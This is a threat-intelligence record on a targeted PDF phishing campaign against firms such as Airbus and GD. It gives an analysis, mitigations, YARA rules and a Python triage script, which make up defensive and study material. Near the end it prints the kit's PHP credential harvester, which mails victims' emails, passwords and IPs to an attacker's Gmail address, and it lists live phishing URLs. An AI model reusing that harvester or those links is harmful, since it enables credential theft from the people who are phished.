
Targeted phishing - PDF documents / phishkit

Severity: Low
Published: Thu May 16 2019 (05/16/2019, 00:00:00 UTC)
Source: CIRCL OSINT Feed

Description

Targeted phishing - PDF documents / phishkit

AI-Powered Analysis

Last updated: 12/06/2025, 04:35:11 UTC

Technical Analysis

The threat described is a targeted phishing campaign that uses PDF documents as the delivery vector. The PDFs may carry malicious payloads or links to phishing sites and are typically produced with phishkits, pre-packaged tools that simplify the creation and distribution of phishing content. The attack pattern maps to MITRE ATT&CK techniques T1193 (Spearphishing Attachment) and T1192 (Spearphishing Link): the adversaries craft emails with the malicious PDF either attached or linked, aiming to persuade recipients to open it. Once opened, a PDF can exploit vulnerabilities in the PDF reader or prompt the user to enter credentials on a fake login page, leading to credential theft or malware installation. The campaign is targeted at specific individuals or organizations, which raises its likelihood of success compared to generic phishing. The 'perpetual' lifetime tag marks the threat as persistent and ongoing, but no exploits in the wild or patches are currently known, which suggests the threat relies on social engineering rather than technical vulnerabilities. The low severity rating reflects the current impact assessment and does not diminish the risk if a phishing attempt succeeds. Indicators of compromise are not provided, which may complicate detection efforts. The threat is sourced from CIRCL OSINT feeds, which focus on open-source intelligence gathering on phishing activities.

Potential Impact

For European organizations, the impact of this threat primarily involves credential compromise, unauthorized access, and potential malware infection. Successful spearphishing can lead to data breaches, financial fraud, and disruption of business operations. Organizations in sectors such as finance, government, healthcare, and critical infrastructure are particularly at risk because of the high value of their data and systems. Delivering the lure as a PDF exploits common user behaviour and trust in a familiar document format, which increases the chance that the recipient interacts with it. Although the current severity is low, the ease of exploitation and the targeted nature of the campaign mean that a successful attack could have medium to high consequences, including reputational damage and regulatory penalties under GDPR if personal data is exposed. Because no patches or technical exploits are involved, traditional vulnerability management is less effective here, and the emphasis falls on user vigilance and detection capabilities.

Mitigation Recommendations

To mitigate this threat, European organizations should implement a multi-layered defense strategy:

1) Conduct targeted user awareness and phishing simulation training focused on recognizing malicious PDFs and suspicious links, emphasizing the risks of spearphishing.
2) Deploy advanced email filtering solutions capable of scanning and sandboxing PDF attachments and embedded links to detect malicious content before delivery.
3) Utilize endpoint protection platforms with behavioral analysis to detect and block exploitation attempts from malicious PDFs.
4) Enforce strict access controls and multi-factor authentication to reduce the impact of credential theft.
5) Monitor network traffic for unusual activity indicative of phishing or post-compromise actions.
6) Establish incident response procedures specifically for phishing incidents, including rapid containment and credential resets.
7) Encourage reporting of suspicious emails to security teams to improve threat intelligence and response.
8) Regularly update and patch PDF reader software to minimize exploitation of known vulnerabilities, even though no specific patches are currently available for this threat.
9) Leverage threat intelligence feeds to stay informed about emerging phishing tactics and indicators.


Technical Details

UUID: 5cdd3938-7134-4908-9552-173cc0a8016e
Original timestamp: 1764973857

Indicators of Compromise

Yara

rule PDF_LIFT
{
    strings:
        $a = "Rect[ 195.05 428.59 411.79 489.67]"
    condition:
        all of them
}

rule PDF_JAT_AUTHOR
{
    strings:
        $a = "<</Author(JAT)"
    condition:
        all of them
}

PDF_JAT_AUTHOR is a generic yara rule to find the common JAT author.
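As an added example (not part of this record or the CIRCL feed), a Python triage script that mirrors the two YARA rules above and, in the spirit of mitigation step 2, extracts /URI targets from PDF link annotations and flags paths that embed one of the listed target organisations, the pattern seen in the URL indicators. The sample PDF bytes and the host phish.example are constructed; only literal-string /URI entries are handled.

```python
import re
from urllib.parse import urlparse

# Literal strings from this record's two YARA rules and the organisations
# whose names appear in its phishing-link paths (target-org indicators).
YARA_STRINGS = {
    "PDF_LIFT": b"Rect[ 195.05 428.59 411.79 489.67]",
    "PDF_JAT_AUTHOR": b"<</Author(JAT)",
}
TARGET_ORGS = {"airbus.com", "tenova.com", "standardaero.com", "gd.com",
               "utc.com", "cdnrg.com", "akhurst.com"}

# Link annotations are objects with /Subtype /Link; literal-string /URI only.
LINK_OBJ_RE = re.compile(rb"/Subtype\s*/Link.*?endobj", re.S)
URI_RE = re.compile(rb"/URI\s*\(([^)]*)\)")


def extract_link_uris(data: bytes) -> list[str]:
    """Collect the /URI targets of every link annotation in the PDF bytes."""
    return [m.group(1).decode("latin-1")
            for obj in LINK_OBJ_RE.finditer(data)
            for m in URI_RE.finditer(obj.group(0))]


def impersonated_orgs(uri: str) -> list[str]:
    """Target-org names embedded in the URI path, the pattern of the listed links."""
    path = urlparse(uri).path.lower()
    return sorted(org for org in TARGET_ORGS if org in path)


def triage_pdf(data: bytes) -> dict:
    """Apply the record's YARA strings and report outbound links for review."""
    rule_hits = [name for name, s in YARA_STRINGS.items() if s in data]
    links = [{"uri": u, "impersonates": impersonated_orgs(u)}
             for u in extract_link_uris(data)]
    flagged = bool(rule_hits) or any(l["impersonates"] for l in links)
    return {"rule_hits": rule_hits, "links": links,
            "verdict": "suspicious" if flagged else "clean"}


# Constructed sample (not one of the page's files): minimal PDF-like bytes
# with the JAT author and a link whose path mimics one of the target orgs.
SAMPLE_PDF = (
    b"%PDF-1.5\n"
    b"1 0 obj <</Author(JAT)/Producer(x)>> endobj\n"
    b"2 0 obj <</Type/Annot/Subtype/Link/Rect[ 195.05 428.59 411.79 489.67]"
    b"/A<</S/URI/URI(https://phish.example/document/airbus.com/)>>>> endobj\n"
)

if __name__ == "__main__":
    print(triage_pdf(SAMPLE_PDF))
```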

Email

jatboss6@gmail.com (email used to send credentials; found in the sendmail.php file)

Url

Phishing links:
https://lulufabllc.com/doc/cdnrg.com/index.php
https://helpersserer.com/wp-inc/Response/www.tenova.com/index.php
https://www.arbutusroutes.com/document/standardaero.com/
https://www.arbutusroutes.com/document/utc.com/
https://www.arbutusroutes.com/document/gd.com/
https://www.arbutusroutes.com/document/airbus.com/
https://drpianotellsall.com/atkinspiano.com/wwwwww/sma/index.php
https://arbutusroutes.com/ssl/akhurst.com/index.php

Older phishing link, where the login page was mirrored on Wed, 12 Sep 2018 06:29:39 GMT:
http://office.online-drive.ml/push-doc/cproduct_brochure_fg.php

Target org

airbus.com
tenova.com
standardaero.com
gd.com
utc.com
cdnrg.com
akhurst.com

File

New-Updated-docs.zip
sendmail.php

Mime type

PDF document, version 1.5
PDF document, version 1.5
PDF document, version 1.5
PDF document, version 1.5
PDF document, version 1.7
CDFV2 Microsoft Outlook Message

Text

Adobe-Standard-Encoding
Malicious
Suspect
JATBOSS
<?php
if(isset($_SERVER['HTTP_X_REAL_IP'])){ $ip = $_SERVER['HTTP_X_REAL_IP']; }else{ $ip=$_SERVER['REMOTE_ADDR']; }
$message .= "|----------| E M A I L |--------------|\n";
$message .= "Online: ".$_POST['email']."\n";
$message .= "pass: ".$_POST['pwd']."\n";
$message .= "|--------------- I N F O | I P -------------------|\n";
$message .= "|Client IP: ".$ip."\n";
$message .= "|--- http://www.geoiptool.com/?IP=$ip ----\n";
$message .= "User Agent : ".$useragent."\n";
$message .= "|----------- HACKED BY JATBOSS --------------|\n";
$send = "jatboss6@gmail.com";
$subject = "$country | $ip";
{ mail("$send", "$subject", $message); }
?>
PHP
Malicious
Threat ID: 6933b2702271496a0fa16ea3

Added to database: 12/6/2025, 4:34:56 AM

Last enriched: 12/6/2025, 4:35:11 AM

Last updated: 12/8/2025, 2:15:59 AM
